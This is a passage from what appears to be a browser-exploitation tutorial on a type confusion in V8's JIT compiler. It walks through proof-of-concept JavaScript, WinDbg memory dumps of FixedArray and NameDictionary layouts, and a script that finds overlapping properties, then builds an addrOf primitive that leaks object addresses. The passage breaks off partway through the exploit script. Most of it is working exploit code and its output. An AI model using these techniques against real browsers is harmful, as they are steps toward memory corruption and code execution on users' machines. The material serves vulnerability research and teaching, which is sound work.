Now that we have confirmed that JIT’d code does indeed remove the CheckMaps node, let’s modify our proof of concept to not use %OptimizeFunctionOnNextCall and instead put our code within a loop so that JIT will take over when it is executed.

Additionally, this time let’s add an out-of-line property to our object so that we can force JIT to access the backing store as an array, which will trigger our type confusion.

Our updated POC will look like so:

function vuln(obj) {
  // Access Property a of obj, forcing a CheckMap operation
  obj.a;

  // Force a Map Transition via our side-effect
  Object.create(obj)

  // Trigger our type-confusion by accessing an out-of-bound property
  return obj.b;
}

for (let i = 0; i < 10000; i++) {
  let obj = {a:42}; // Create object with in-line properties
  obj.b = 43; // Store property out-of-line in backing store
  vuln(obj); // Trigger type-confusion
}

After updating this code and running it with the --trace-turbo flag, we can again confirm that we have a working type confusion. As we can see in the IR, the compiler loads our object’s backing store pointer at offset 8, and then loads property b, which it thinks is at offset 16 in the array. However, it will access another region of data since the backing store is no longer an array but a dictionary.

Exploiting a Type Confusion for JSCreateObject

Now that we have a working type confusion where V8 accesses a NameDictionary as an array, we have to figure out how we can abuse this vulnerability to gain read and write access to V8’s heap.

Unlike many exploits, this vulnerability does not involve a memory corruption flaw, so it is not possible to overflow a buffer and control the instruction pointer (RIP). However, type confusion vulnerabilities do allow us to manipulate function pointers and data within the memory layout of an object. For instance, if we can overwrite the pointer to an object and V8 dereferences or jumps to that pointer, we can achieve code execution.

Unfortunately, we can’t just blindly start reading and writing data into objects without having some precision. As seen in the IR above, we do have some control over where V8 will go to read and write data by specifying a property in an array. However, due to the type confusion, this array is converted into a NameDictionary, which means the layout changes.

To exploit this vulnerability, we need to understand how these two object structures differ and how we can manipulate them to achieve our goals.

As we know from Part 1, an array is simply a FixedArray structure that stores property values one after the other and is accessed by index. As you can see in the IR above, the first LoadField call is at offset 8, which would be the properties backing store pointer within JSObject. Since we have only one out-of-line property in the backing store, we see the second LoadField access the first property at offset 16, initially skipping over the Map and Length.

During the conversion from an array to a dictionary, we also know that the property metadata is no longer stored in the Descriptor Array in the Map but directly in the properties backing store. In this case, the dictionary stores properties inside a dynamically sized buffer of name, value, and details triplets.

In essence, the NameDictionary structure is more complex than what we detailed in Part 1. To better understand the memory layout of a NameDictionary, I have provided a visual example below.

As you can see, the NameDictionary does store the property triplets as well as additional metadata related to the number of elements in the dictionary. In this case, if our type-confusion read the data at offset 16 like in the IR above, then it would have read the number of elements that are stored within the dictionary.

To validate this information, we can reuse our proof-of-concept script and set breakpoints in WinDbg to examine the memory layout of our objects. One simple way to debug these proof-of-concept scripts is to set a breakpoint on the RUNTIME_FUNCTION(Runtime_DebugPrint) function in the /src/runtime/runtime-test.cc source file. This will trigger when %DebugPrint is called, allowing us to get debug output from d8 and further analyze the exploit in WinDbg.

Let’s start by modifying the proof of concept by adding the %DebugPrint call before and after the object is changed. The script should look like this:

function vuln(obj) {
  // Access Property a of obj, forcing a CheckMap operation
  obj.a;

  // Force a Map Transition via our side-effect
  Object.create(obj)

  // Trigger our type-confusion by accessing an out-of-bound property
  return obj.b;
}

for (let i = 0; i < 10000; i++) {
  let obj = {a:42}; // Create object with in-line properties
  obj.b = 43; // Store property out-of-line in backing store
  if (i === 1) { %DebugPrint(obj); } // Print the object before JIT kicks in
  vuln(obj); // Trigger type-confusion
  if (i === 9999) { %DebugPrint(obj); } // Print the object after JIT kicks in
}

To help analyze the memory layout of our object, we modify the proof-of-concept script to print out the object information at two points: once at iteration 1 after setting up its properties, and again at iteration 9999 after JIT kicks in and modifies the object.

To debug this script, we can launch d8 within WinDbg using the --allow-natives-syntax flag, followed by the location of the proof-of-concept script. For example:

Once done, press Debug. This will launch d8 and will hit the first debugging breakpoint which is set by WinDbg.

(17f0.155c): Break instruction exception - code 80000003 (first chance)
ntdll!LdrpDoDebuggerBreak+0x30:
00007ffd`16220950 cc              int     3

Now we can search for our DebugPrint function among V8’s symbols by using the x v8!*DebugPrint* command within WinDbg. You should get output similar to the below.

0:000> x v8!*DebugPrint*
*** WARNING: Unable to verify checksum for C:\dev\v8\v8\out\x64.debug\v8.dll
00007ffc`dc035ba0 v8!v8::internal::Runtime_DebugPrint (int, class v8::internal::Object **, class v8::internal::Isolate *)
00007ffc`db99ef00 v8!v8::internal::ScopeIterator::DebugPrint (void)
00007ffc`dc035f40 v8!v8::internal::__RT_impl_Runtime_DebugPrint (class v8::internal::Arguments *, class v8::internal::Isolate *)

We’ll set a breakpoint on the v8!v8::internal::Runtime_DebugPrint function. You can do that by running the following command in WinDbg.

bp v8!v8::internal::Runtime_DebugPrint

Once that breakpoint is configured, press Go or type g in the command window and we should hit our DebugPrint breakpoint.

You may notice that, even though the breakpoint is hit, there is no output in d8. To remedy this, we can set a breakpoint on line 542 by clicking on it and pressing F9. Then, we can press Shift + F11 or “Step Out” to continue execution and see the debug output in d8.

DebugPrint: 000000C44E40DAD9: [JS_OBJECT_TYPE]
 - map: 0x02a66658c251 <Map(HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x00a318f04229 <Object map = 000002A6665822F1>
 - elements: 0x02c9f8782cf1 <FixedArray[0]> [HOLEY_ELEMENTS]
 - properties: 0x00c44e40db81 <PropertyArray[3]> {
    #a: 42 (data field 0)
    #b: 43 (data field 1) properties[0]
 }

Upon inspection of the output, we can see that our object has one inline property and one out-of-line property, which should be in the properties backing store at address 0x00c44e40db81. Let’s quickly peek into our object with WinDbg to verify that address.

0:000> dq 000000C44E40DAD9-1 L6
000000c4`4e40dad8  000002a6`6658c251 000000c4`4e40db81
000000c4`4e40dae8  000002c9`f8782cf1 0000002a`00000000
000000c4`4e40daf8  000002c9`f8782341 00000005`00000000

Right away, we notice something different. While the object structure matches the addresses within the debug output, we notice that these are full 64-bit addresses. The reason for this is that pointer compression wasn’t yet implemented in this version of V8, so V8 still uses full 64-bit tagged values. As a result, small integers are not stored doubled as they are under pointer compression. Instead, the value sits in the upper 32 bits of the word. This can be confirmed by checking that 0x0000002a00000000 carries 0x2a, which is 42, the value of the first inline property.
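To make reading these dumps easier, here is a small sketch that decodes a 64-bit word the way it appears in this build. The function name decodeTagged is made up for this example, and the sketch assumes the layout seen in the dump above: heap pointers have their low bit set, and small integers keep their value in the upper 32 bits.

```javascript
// Decode 64-bit tagged words as they appear in the WinDbg dump
// (assumes a V8 build without pointer compression).
function decodeTagged(word) {
  if ((word & 1n) === 1n) {
    // Low bit set: heap object pointer. Subtract the tag for the real address,
    // which is the same "-1" we pass to the dq command.
    return { type: "pointer", address: word - 1n };
  }
  // Low bit clear: small integer, with the payload in the upper 32 bits.
  return { type: "smi", value: Number(BigInt.asIntN(32, word >> 32n)) };
}

const inlineA = decodeTagged(0x0000002a00000000n);
const backingStore = decodeTagged(0x000000c44e40db81n);
console.log(inlineA.value);                     // 42
console.log(backingStore.address.toString(16)); // c44e40db80
```

The two sample words are taken straight from the object dump: the first is the inline property a, and the second is the properties backing store pointer.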

Knowing this, let’s validate our properties array backing store structure by inspecting its memory content in WinDbg.

0:000> dq 0x00c44e40db81-1 L6
000000c4`4e40db80  000002c9`f8783899 00000003`00000000
000000c4`4e40db90  0000002b`00000000 000002c9`f87825a1
000000c4`4e40dba0  000002c9`f87825a1 deadbeed`beadbeef

Upon doing so, we see that the b property (with a value of 43 or 0x2b in hex) is at offset 16 of the array in the property backing store.

Now that we have validated our object structure, let’s press Go and then Shift + F11 to get the output of our modified object after triggering the bug.

DebugPrint: 000000C44E40DAD9: [JS_OBJECT_TYPE]
 - map: 0x02a66658c2f1 <Map(HOLEY_ELEMENTS)> [DictionaryProperties]
 - prototype: 0x00a318f04229 <Object map = 000002A6665822F1>
 - elements: 0x02c9f8782cf1 <FixedArray[0]> [HOLEY_ELEMENTS]
 - properties: 0x00c44e40dba9 <NameDictionary[29]> {
   #a: 42 (data, dict_index: 1, attrs: [WEC])
   #b: 43 (data, dict_index: 2, attrs: [WEC])
 }

After triggering the bug, we can see that the object’s map has changed and the property store has been converted to a NameDictionary of size 29. We can confirm that the properties backing store is now at address 0x00c44e40dba9 by checking the object structure in WinDbg.

0:000> dq 000000C44E40DAD9-1 L6
000000c4`4e40dad8  000002a6`6658c2f1 000000c4`4e40dba9
000000c4`4e40dae8  000002c9`f8782cf1 00000000`00000000
000000c4`4e40daf8  000002c9`f8782341 00000005`00000000

And it is! With that, let’s look into our dictionary structure at address 0x00c44e40dba9.

0:000> dq 0x00c44e40dba9-1 L12
000000c4`4e40dba8  000002c9`f8783669 0000001d`00000000
000000c4`4e40dbb8  00000002`00000000 00000000`00000000
000000c4`4e40dbc8  00000008`00000000 00000003`00000000
000000c4`4e40dbd8  00000000`00000000 000002c9`f87825a1
000000c4`4e40dbe8  000002c9`f87825a1 000002c9`f87825a1
000000c4`4e40dbf8  000000a3`18f22049 0000002a`00000000
000000c4`4e40dc08  000001c0`00000000 000002c9`f87825a1
000000c4`4e40dc18  000002c9`f87825a1 000002c9`f87825a1
000000c4`4e40dc28  000002c9`f87825a1 000002c9`f87825a1

Upon inspecting the dictionary structure at this address, we can see that it is significantly different from the FixedArray structure. Additionally, we see that the value of the first property a (42 or 0x2a) is at offset 88 within this structure, and the value of the second property b (43 or 0x2b) is not present in this part of the dump. It’s likely that this value is located further within the dictionary’s memory layout.

Now you might be asking yourself, what are these odd values such as 000002c9f87825a1 within the dictionary structure? Well, a dictionary is actually a HashMap that uses a hash table to map a property’s key to a location in the table, so many of its slots are empty at any given time. The odd value appears to be the filler for those empty slots rather than property data: the same value also pads the unused slots of the PropertyArray we dumped earlier.

At the top of the dictionary, we can see that the Map of the object is at offset 0, the length of the dictionary (29 or 0x1d in hex) is at offset 8, and the number of elements within the dictionary (2) is at offset 16.
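These offsets can be double-checked by loading the dumped qwords into an array and reading them back by byte offset. The sketch below uses the exact values from the WinDbg output above. The helper smiAt is a made-up name, and it assumes each slot it is asked about holds a small integer in the upper 32 bits.

```javascript
// The 18 qwords printed by `dq 0x00c44e40dba9-1 L12`, in order.
const dump = [
  0x000002c9f8783669n, 0x0000001d00000000n,
  0x0000000200000000n, 0x0000000000000000n,
  0x0000000800000000n, 0x0000000300000000n,
  0x0000000000000000n, 0x000002c9f87825a1n,
  0x000002c9f87825a1n, 0x000002c9f87825a1n,
  0x000000a318f22049n, 0x0000002a00000000n,
  0x000001c000000000n, 0x000002c9f87825a1n,
  0x000002c9f87825a1n, 0x000002c9f87825a1n,
  0x000002c9f87825a1n, 0x000002c9f87825a1n,
];

// Read the small integer stored at a byte offset (one qword per 8 bytes).
const smiAt = (offset) => Number(dump[offset / 8] >> 32n);

console.log(smiAt(8));  // 29, the length of the dictionary
console.log(smiAt(16)); // 2, the number of elements
console.log(smiAt(88)); // 42, the value of property a

// Locate the qword that carries the value 42 and convert its index to an offset.
const offsetOfA = dump.findIndex((w) => w === 0x0000002a00000000n) * 8;
console.log(offsetOfA); // 88
```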

In our case, when we access the b property, V8 will access the number of elements in the dictionary (which should be 2, as confirmed by the IR). Upon running this code in d8 after triggering the bug, it does indeed return 2.

d8> %OptimizeFunctionOnNextCall(vuln)
d8> let obj = {a:42}; obj.b = 43; vuln(obj);
2

Perfect! We just confirmed that our type confusion works and that we have some control over what type of data we can access in the dictionary by specifying a property. This will allow us to traverse the dictionary by 8 bytes for each property.

Now, let’s go back to our conversation about having precision when trying to read and write data to an object. As you can see, with two properties, we can only read the number of elements within the dictionary. This doesn’t really provide us much benefit because usually we don’t have much control over this part of the structure as it’s dynamically allocated.

What we want to do is gain read and write access to a property’s value within the dictionary, since we can easily read and write data to that value just by specifying the property’s index.

As we’ve already seen, our first property value, while at offset 16 in the array, is at offset 88 in the dictionary. As such, if we were to add 88/8=11 different properties, we should be able to read and write to our first property within the dictionary by accessing property 10 from the backing store (which should be 88 bytes, or 10x8+8, into the array).
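The offset arithmetic can be sketched as a pair of small helpers. This assumes the FixedArray layout seen in the dumps (an 8-byte Map pointer, an 8-byte length, then 8-byte slots) and counts properties from 1, as the paragraph above does. The names slotOffset and slotAtOffset are hypothetical.

```javascript
const HEADER_SIZE = 16; // Map pointer (8 bytes) + length (8 bytes)
const SLOT_SIZE = 8;    // one tagged value per slot

// Byte offset of the n-th out-of-line property (n starts at 1).
function slotOffset(n) {
  return HEADER_SIZE + SLOT_SIZE * (n - 1);
}

// Inverse: which property (1-based) sits at a given byte offset.
function slotAtOffset(offset) {
  return (offset - HEADER_SIZE) / SLOT_SIZE + 1;
}

console.log(slotOffset(1));    // 16, the first property
console.log(slotOffset(10));   // 88, same as 10 * 8 + 8
console.log(slotAtOffset(88)); // 10
```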

This means that for every N properties in the FixedArray, we will have a handful of overlapping properties within the dictionary that are at the same offset.

To help you visualize this, below is an example of a memory dump of a FixedArray with 11 properties and a NameDictionary that has an overlapping property.

   FixedArray                   NameDictionary
000002c9`f8783899             000002c9`f8783669 
0000000E`00000000             0000013F`00000000
00000001`00000000             0000000B`00000000
00000002`00000000             00000000`00000000
00000003`00000000             00000008`00000000 
00000004`00000000             00000003`00000000
00000005`00000000             00000000`00000000
00000006`00000000             000002c9`f87825a1
00000007`00000000             000002c9`f87825a1
00000008`00000000             000002c9`f87825a1
00000009`00000000             000000a3`18f22049
0000000A`00000000   <--!-->   00000001`00000000
0000000B`00000000             000001c0`00000000

As presented in the memory dump, we can see that by accessing property 10 from the FixedArray, we are able to access the value of property 1 after triggering the bug and converting the FixedArray to a NameDictionary. This in essence would allow us to read and write to property 1’s value in the dictionary.

However, there is a problem with this approach: the layout of the NameDictionary will be different in every execution of the engine due to the process-wide randomness used in the hashing mechanism for hash map tables. This can be verified by rerunning the proof of concept and inspecting the dictionary structure after triggering the bug. Your results will vary, but in my case, I had the following output:

0:000> dq 0x025e3e88dba9-1 L12
0000025e`3e88dba8  0000028d`cdf03669 0000001d`00000000
0000025e`3e88dbb8  00000002`00000000 00000000`00000000
0000025e`3e88dbc8  00000008`00000000 00000003`00000000
0000025e`3e88dbd8  00000000`00000000 00000305`8f922061
0000025e`3e88dbe8  0000002b`00000000 000002c0`00000000
0000025e`3e88dbf8  0000028d`cdf025a1 0000028d`cdf025a1
0000025e`3e88dc08  0000028d`cdf025a1 0000028d`cdf025a1
0000025e`3e88dc18  0000028d`cdf025a1 0000028d`cdf025a1
0000025e`3e88dc28  0000028d`cdf025a1 0000028d`cdf025a1

As we can see, property b (with a value of 43 or 0x2b) is now at offset 64 in the dictionary, and property a is not present at the expected location. In this case, property a was actually at offset 184. This means that our previous example of using 11 properties would not work.

Although the properties are not in a known or even guessable order, we still know that there likely exists a pair of properties P1 and P2 that will eventually overlap at the same offset. If we can write a JavaScript function to find these overlapping properties, we will at least be able to gain some precision in reading and writing new values to our properties.

Before writing this function, we need to consider how many properties we should generate in order to find this overlap. Well, due to in-object slack tracking the optimal number of fast properties is 32, so we will use that as our maximum.

Let’s start by repurposing our proof of concept by creating a new function that creates an object with one inline property and 31 out-of-line properties (p1 through p31). The code for this function is as follows:

function makeObj() {
    let obj = {inline: 1234};
    for (let i = 1; i < 32; i++) {
        Object.defineProperty(obj, 'p' + i, {
            writable: true,
            value: -i
        });
    }
    return obj;
}

One thing to note within the function is that we are using a negative value for i. The reason for this is that there are a few unrelated small positive values in the dictionary, such as the length and number of elements. If we use positive values for our property values, there is a risk of getting false positives when searching for overlapping properties. Therefore, we use negative numbers to distinguish our properties from these unrelated values.

From here we can start writing our function that will search for overlapped properties. One modification we will make is to our vuln function, which previously triggered the bug and returned property b of the object. In this case, we want to return the values of all properties so that we can compare them between the array and dictionary.

To do this, we can use the eval function with template literals to generate all the return statements at runtime with just a few lines of code. The following code allows us to do that:

function findOverlappingProperties() {
    // Create an array of the 32 property names p0..p31
    let pNames = [];
    for (let i = 0; i < 32; i++) {
        pNames[i] = 'p' + i;
    }

    // Create eval of function that will generate code during runtime
    eval(`
    function vuln(obj) {
      obj.inline;
      Object.create(obj);
      ${pNames.map((p) => `let ${p} = obj.${p};`).join('\n')}
      return [${pNames.join(', ')}];
    }
  `)
}

If you are confused about the last two lines in the eval function, here is a brief explanation. We are using template literals (backticks) and placeholders within the template, which are embedded expressions delimited by a dollar sign and curly braces: ${expression}. When the template literal is evaluated, just before the resulting string is handed to eval, these expressions undergo string interpolation and each placeholder is replaced with the generated string.

In our case we are using the map function on the pNames array to create a new array of strings that will equate to let p1 = obj.p1. This allows us to generate these lines of code to set and return the values of all properties during runtime, instead of hardcoding everything.

An example of the output after the eval function can be seen in d8, like so:

d8> let pNames = []; for (let i = 0; i < 32; i++) {pNames[i] = 'p' + i;}
"p31"
d8> pNames
["p0", "p1", "p2", "p3", "p4", "p5", "p6", "p7", "p8", "p9", "p10", "p11", "p12", "p13", "p14", "p15", "p16", "p17", "p18", "p19", "p20", "p21", "p22", "p23", "p24", "p25", "p26", "p27", "p28", "p29", "p30", "p31"]
d8> pNames.map((p) => `let ${p} = obj.${p};`).join('\n')
let p0 = obj.p0;
let p1 = obj.p1;
let p2 = obj.p2;
let p3 = obj.p3;
let p4 = obj.p4;
let p5 = obj.p5;
...
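If you want to see the generated function actually run outside of d8, the following is a minimal sketch for Node. It does not trigger the bug; it only demonstrates the code-generation trick on a plain object with four property names. Note that it wraps the generated source in parentheses so that eval returns the function as a value, which is a small variation on the declaration style used in this post. The name readAll is hypothetical.

```javascript
// Four names instead of 32 to keep the generated source short.
const names = ['p0', 'p1', 'p2', 'p3'];

// Build the source text. The inner template literal produces one
// "let pN = obj.pN;" line per name.
const source = `
(function readAll(obj) {
  ${names.map((p) => `let ${p} = obj.${p};`).join('\n  ')}
  return [${names.join(', ')}];
})`;

// eval of a parenthesised function expression returns the function.
const readAll = eval(source);

console.log(source);
console.log(readAll({ p1: -1, p2: -2, p3: -3 }));
```

Since the test object has no p0 property, the first slot of the returned array is undefined, which is the same reason the first printed value is empty in the d8 output.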

Now that we have this code and understand how it works, we can update our proof of concept script to include these new functions, trigger the bug, and then print the values for both the array and dictionary. Our updated script will now look like so:

// Create object with one inline and 31 out-of-line properties (p1..p31)
function makeObj() {
    let obj = {inline: 1234};
    for (let i = 1; i < 32; i++) {
        Object.defineProperty(obj, 'p' + i, {
            writable: true,
            value: -i
        });
    }
    return obj;
}

// Find a pair of properties where p1 is stored at the same offset
// in the FixedArray as p2 is in the NameDictionary
function findOverlappingProperties() {
    // Create an array of the 32 property names p0..p31
    let pNames = [];
    for (let i = 0; i < 32; i++) {
        pNames[i] = 'p' + i;
    }

    // Create eval of our vuln function that will generate code during runtime
    eval(`
    function vuln(obj) {
      // Access Property inline of obj, forcing a CheckMap operation
      obj.inline;
      // Force a Map Transition via our side-effect
      this.Object.create(obj);
      // Trigger our type-confusion by accessing out-of-bound properties
      ${pNames.map((p) => `let ${p} = obj.${p};`).join('\n')}
      return [${pNames.join(', ')}];
    }
  `)

    // JIT code to trigger vuln
    for (let i = 0; i < 10000; i++) {
        let res = vuln(makeObj());
        // Print FixedArray when i=1 and Dictionary when i=9999
        if (i == 1 || i == 9999) {
            print(res);
        }
    }
}

print("[+] Finding Overlapping Properties");
findOverlappingProperties();

When we run the updated script in d8, we should get results which are similar to the following:

C:\dev\v8\v8\out\x64.debug>d8 C:\Users\User\Desktop\poc.js
[+] Finding Overlapping Properties
,-1,-2,-3,-4,-5,-6,-7,-8,-9,-10,-11,-12,-13,-14,-15,-16,-17,-18,-19,-20,-21,-22,-23,-24,-25,-26,-27,-28,-29,-30,-31
,32,0,64,33,0,,,,p13,-13,3824,,,,p17,-17,4848,inline,1234,448,,,,p29,-29,7920,,,,p19,-19

Great! Our type-confusion works and we are able to leak data from the dictionary. From the output, we can see that we have a few overlapping properties, such as p10 overlapping with p13 (note the negative values).
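To double-check which properties overlap, we can feed the second printed line back into a few lines of JavaScript. This is only a sketch for Node that parses the text output shown above; it applies the same test we are about to build into the exploit (a negative value between -32 and 0 that does not point back at its own index).

```javascript
// Second line of the d8 output above (values read after the bug triggers).
const printed = ',32,0,64,33,0,,,,p13,-13,3824,,,,p17,-17,4848,' +
                'inline,1234,448,,,,p29,-29,7920,,,,p19,-19';

const res = printed.split(',');
const overlaps = [];

res.forEach((text, i) => {
  // parseInt yields NaN for empty slots and for names such as "p13".
  const v = Number.parseInt(text, 10);
  if (Number.isInteger(v) && v < 0 && v > -32 && -v !== i) {
    overlaps.push([i, -v]);
  }
});

console.log(overlaps.map(([a, b]) => `p${a} -> p${b}`).join(', '));
```

For this particular run, the script lists p10 overlapping p13, along with p16/p17, p25/p29, and p31/p19.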

Now that we have confirmed that this code works and we have overlapping properties, we can modify the script to enumerate through the results and choose an overlapping property whose value is less than 0 and greater than -32. Also, let’s remove properties that overlap themselves.

The updated code will look like the following:

// Function that creates an object with one in-line and 31 out-of-line properties (p1..p31)
function makeObj() {
    let obj = {inline: 1234};
    for (let i = 1; i < 32; i++) {
        Object.defineProperty(obj, 'p' + i, {
            writable: true,
            value: -i
        });
    }
    return obj;
}

// Function that finds a pair of properties where p1 is stored at the same offset
// in the FixedArray as p2 in the NameDictionary
let p1, p2;

function findOverlappingProperties() {
    // Create an array of the 32 property names p0..p31
    let pNames = [];
    for (let i = 0; i < 32; i++) {
        pNames[i] = 'p' + i;
    }

    // Create eval of our vuln function that will generate code during runtime
    eval(`
    function vuln(obj) {
      // Access Property inline of obj, forcing a CheckMap operation
      obj.inline;
      // Force a Map Transition via our side-effect
      this.Object.create(obj);
      // Trigger our type-confusion by accessing out-of-bound properties
      ${pNames.map((p) => `let ${p} = obj.${p};`).join('\n')}
      return [${pNames.join(', ')}];
    }
  `)

    // JIT code to trigger vuln
    for (let i = 0; i < 10000; i++) {
        // Create Object and pass it to Vuln function
        let res = vuln(makeObj());
        // Look for overlapping properties in results
        for (let i = 1; i < res.length; i++) {
            // If i is not the same value, and res[i] is between -32 and 0, it overlaps
            if (i !== -res[i] && res[i] < 0 && res[i] > -32) {
                [p1, p2] = [i, -res[i]];
                return;
            }
        }
    }
    throw "[!] Failed to find overlapping properties";
}

print("[+] Finding Overlapping Properties...");
findOverlappingProperties();
print(`[+] Properties p${p1} and p${p2} overlap!`);

If we run the updated code in d8 again, we will see that we are able to consistently find overlapping properties.

C:\dev\v8\v8\out\x64.debug>d8 C:\Users\User\Desktop\poc.js
[+] Finding Overlapping Properties...
[+] Properties p7 and p12 overlap!

Understanding Browser Exploit Primitives

Alright, so we’re able to exploit our bug to trigger a type-confusion and discovered overlapping properties that we can utilize to read and write data to. To those with a keen eye, you might have noticed that currently we can only read SMIs and strings. In essence, just reading integers or strings is useless; we need to find a way to read and write memory pointers.

To help us accomplish that, we need to construct a read and write exploit primitive known as the addrOf and fakeObj primitive, respectively. These primitives will allow us to exploit our overlapping properties by confusing an object of one type with an object of another type.

To build these primitives, we can abuse our current type-confusion and the way Maps work with redundancy elimination in JIT to construct our own global type confusion for any arbitrary value of our choosing!

If you remember back in Part 1 and Part 2, we discussed Maps and the BinaryOp along with the Feedback Lattice. As we know, Maps store type information for properties and the BinaryOp stores the potential type states of properties during JIT compilation.

For example, let’s take the following code:

function test(obj) {
  return obj.b.x;
}

let obj = {};
obj.a = 13;
obj.b = {x: 14};

After this code is executed in V8, the Map of obj will show that it has a property a that is an SMI and a property b that is an object with a property x that is also an SMI.

If we force this function to be JIT’d, then the Map check for b will be omitted, since speculative assumptions will be made to assume that property b will always be an object with a specific Map, allowing redundancy elimination to remove the check. If this type information is invalidated, such as when a property is added or the value is modified to be a double, then a new Map will be allocated and the BinaryOp will be updated to include type information for both an SMI and Double.

With this in mind, it becomes possible to abuse this scenario along with our overlapping properties to construct a powerful exploit primitive that will be the foundation for our read and write primitives.

An example of this code that will be used as our base for the primitives can be seen below with comments.

eval(`
  function vuln(obj) {
    // Access Property inline of obj, forcing a CheckMap operation
    obj.inline;
    // Force a Map Transition via our side-effect
    this.Object.create(obj);
    // Trigger our type-confusion by accessing an out-of-bound property.
    // This will load p1 from our object thinking it's ObjX, but instead
    // due to our bug and overlapping properties, it loads p2 which is ObjY
    let p = obj.p${p1}.x;
    return p;
  }
`)

let obj = makeObj();
obj[p1] = {x: ObjX};
obj[p2] = {y: ObjY};
vuln(obj)

As you can see, p1 and p2 are our overlapping properties after our array is converted to a dictionary. By setting p1 as Object X and p2 as Object Y, when we JIT compile the vuln function, the compiler will assume that our variable p will be of type Object X due to the Map of obj omitting the type checks.

However, due to the initial type-confusion vulnerability we are exploiting, the code will actually read property p2 and receive Object Y. In this case, the engine will then represent Object Y as Object X, causing another type confusion.

By using this global type confusion that we constructed, we can now create our read and write primitives to leak object addresses and to write to arbitrary object fields.

The addrOf Read Primitive

The addrOf primitive stands for “Address Of” and it does exactly what it says. It allows us to leak the address pointer of a specific object by abusing our constructed type-confusion.

As demonstrated in the example above, we can create a global type confusion by abusing our overlapping properties and the way Maps store type information, allowing us to represent the output of Object Y as Object X.

So, the question is, how do we abuse this scenario to leak a memory address?

We can’t simply pass in two objects and return an object because they are the same shape. If we do this, V8 will simply dereference the object and either return the object type, or the object’s properties.

An example of what we would see is shown below:

C:\dev\v8\v8\out\x64.debug>d8 --allow-natives-syntax C:\Users\User\Desktop\poc.js
[+] Finding Overlapping Properties...
[+] Properties p24 and p21 overlap!
[+] Leaking Object Address...
[+] Object Address: [object Object]

As you can see, the return value of [object Object] isn’t useful for us. Instead, we need to return the object but as a different type.

In this case, we can create a type-confusion read primitive by making Object X a Double! This way, when we call p1, it will expect a double value, and since p1 actually returns p2 (which is an object pointer) instead of dereferencing the pointer, it will return it to us as a double floating-point number!

Let’s see this in action. Using the example code from earlier, we can modify it to create an addrOf function by changing Object X to a double and leaving Object Y as an object.

The function will look like so:

function addrOf() {
    eval(`
    function vuln(obj) {
      obj.inline;
      this.Object.create(obj);
      return obj.p${p1}.x;
    }
  `);

    let obj = makeObj()
    obj[p1] = {x: 13.37};
    obj[p2] = {y: obj};
    vuln(obj); // Returns Address of obj as Double
}

As you can see, we set p1 as a double with the value of 13.37 and we set Object Y as the object that gets created from our makeObj function.

After triggering the vulnerability through the vuln function, the engine will assume that the value returned to us by obj.p1.x will be a double, but instead it will load the pointer to our p2 object and return it as a double.

This way we should be able to leak our object’s address, but we have one slight problem with the makeObj function. Currently the makeObj function creates our object with one in-line and 32 out-of-line properties.

As you may recall, those 32 out-of-line properties are all negative numbers which we used to avoid false positives when finding overlapping properties. While this isn’t an issue, the bigger problem is that after we find the overlapping properties, we need to be able to modify those specific property indexes within our array’s backing store so that when the dictionary conversion occurs, we can exploit our type confusion with precision.

Currently, that’s not possible for reasons explained below.

After our object is created, if we try to modify its properties at a specific index, it will either be added to the start or to the end of the properties array. Additionally, we can’t simply modify a named property via its pN name as it’s not defined.

An example of this can be shown below.

d8> let obj = {p1:1, p2:2, p3:3};
d8> obj[12] = 12;
d8> obj
{12: 12, p1: 1, p2: 2, p3: 3}
d8> obj[p3] = 12
(d8):1: ReferenceError: p3 is not defined
obj[p3] = 12
    ^

To accurately set our objects where we need them, we need to create an array of properties that will be passed to our object during creation. This way, by using the index from p1 and p2, we can create a holey array of properties that will allow us to precisely set our objects.

An example of this can be seen below:

d8> let obj = [];
d8> obj[7] = 7;
d8> obj[12] = 12;
d8> obj
[, , , , , , , 7, , , , , 12]

To do this, let’s modify our makeObj function to take in an array of pValues as properties and have pValues[i] set as the value, like this:

// Function that creates an object with one in-line and 32 out-of-line properties
function makeObj(pValues) {
    let obj = {inline: 1234};
    for (let i = 0; i < 32; i++) {
        Object.defineProperty(obj, 'p' + i, {
            writable: true,
            value: pValues[i]
        });
    }
    return obj;
}
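As a quick sanity check that the holey array lands our values on the right named properties, here is a sketch that can be run in Node without triggering the bug. The pair p1 = 7 and p2 = 12 is just the example pair from the earlier run (your values will differ), and target is a hypothetical stand-in for the object whose address we want to leak.

```javascript
// Same makeObj as above, repeated so the snippet is self-contained.
function makeObj(pValues) {
    let obj = {inline: 1234};
    for (let i = 0; i < 32; i++) {
        Object.defineProperty(obj, 'p' + i, {
            writable: true,
            value: pValues[i]
        });
    }
    return obj;
}

// Example pair only; the real values come from findOverlappingProperties.
const [p1, p2] = [7, 12];
const target = {z: 1234};

// Holey array: only the two slots we care about are populated.
const pValues = [];
pValues[p1] = {x: 13.37};
pValues[p2] = {y: target};

const obj = makeObj(pValues);
console.log(obj['p' + p1].x);            // 13.37
console.log(obj['p' + p2].y === target); // true
console.log(obj.p3);                     // undefined (hole in pValues)
```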

With this in place, we can now modify our addrOf function. We’ll start by adding a new pValues array and then setting p1 in the array to be an object with a double value and p2 to be a custom-created object.

function addrOf() {
    eval(`
    function vuln(obj) {
      obj.inline;
      this.Object.create(obj);
      return obj.p${p1}.x;
    }
  `);

    let obj = {z: 1234};
    let pValues = [];
    pValues[p1] = {x: 13.37};
    pValues[p2] = {y: obj};

    for (let i = 0; i < 10000; i++) {
        let res = vuln(makeObj(pValues));
        if (res != 13.37) {
            %DebugPrint(obj);
            return res;
        }
    }
}

As you can see, our JIT loop will call makeObj to create an object with our p1 and p2 properties, and then pass that to our vuln function to trigger the type confusion. The if statement checks whether the result returned by the vuln function differs from 13.37. If it does, it means we successfully triggered our type confusion and have read the address pointer of obj.

Since we are testing this, I have also added a %DebugPrint statement to print out the address of obj. This allows us to validate that the data returned is, in fact, our address.

Our exploit script will now look like so. Note, that in this test case, I simply added a call to addrOf which will exploit our overlapped properties to leak the object address that is hardcoded within the function.

Also, take note that I have modified our findOverlappingProperties function to include a pValues array for our negative numbers. This was done to support the modification we made to our makeObj function.

// Function that creates an object with one in-line and 32 out-of-line properties
function makeObj(pValues) {
    let obj = {inline: 1234};
    for (let i = 0; i < 32; i++) {
        Object.defineProperty(obj, 'p' + i, {
            writable: true,
            value: pValues[i]
        });
    }
    return obj;
}
// Function that finds a pair of properties where p1 is stored at the same offset
// in the FixedArray as p2 in the NameDictionary
let p1, p2;

function findOverlappingProperties() {
    // Create an array of the 32 property names p0..p31
    let pNames = [];
    for (let i = 0; i < 32; i++) {
